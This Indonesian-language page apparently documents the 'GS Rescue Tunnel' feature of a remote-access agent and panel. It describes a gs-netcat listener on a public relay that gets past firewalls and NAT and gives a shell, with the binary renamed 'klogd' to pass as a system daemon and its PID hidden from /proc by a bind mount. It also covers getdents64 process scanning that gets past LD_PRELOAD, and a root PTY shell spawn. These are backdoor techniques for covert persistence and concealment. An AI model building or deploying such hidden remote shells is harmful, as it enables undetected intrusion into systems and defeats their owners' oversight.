GS Rescue Tunnel

Akses darurat via gsocket relay — bypass firewall, NAT, dan segmentasi jaringan.

Cara Kerja

GS Rescue menggunakan gsocket (Global Socket) — koneksi terenkripsi via relay server publik. Tidak perlu IP publik, tidak perlu port forwarding. Cocok untuk server di belakang NAT/firewall ketat.

Di server target (agent): Spawn gs-netcat -l -S -s <rescue_key> sebagai klogd dengan PTY. Berfungsi sebagai listener di relay.

Dari panel/klien: gssh <rescue_key> → connect ke relay → tunnel terenkripsi end-to-end → shell interaktif.

Rescue key: MD5 hash dari IP server. Disimpan di panel, diupdate via heartbeat response.

Stealth gs-netcat

Binary gs-netcat di-copy ke install dir dengan nama klogd. PID disembunyikan dari /proc via mount bind.

Jika proses orphan ditemukan (dari sesi sebelumnya), dibersihkan via:

1. PID file (.klogd.pid) — kill by exact PID
2. iterateProcByExe() via getdents64 — bypass LD_PRELOAD
3. pkill klogd — fallback terakhir

PTY Setup (Python3 + script)

Shell wrapper untuk PTY interaktif yang benar:

Primary:

python3 -c "import pty; pty.spawn(['/bin/bash',...])"

Fallback:

script -q /dev/null bash

Env: TERM=xterm-256color, HOME=/root, SHELL=/bin/bash di-set eksplisit untuk cegah fallback ke /bin/sh.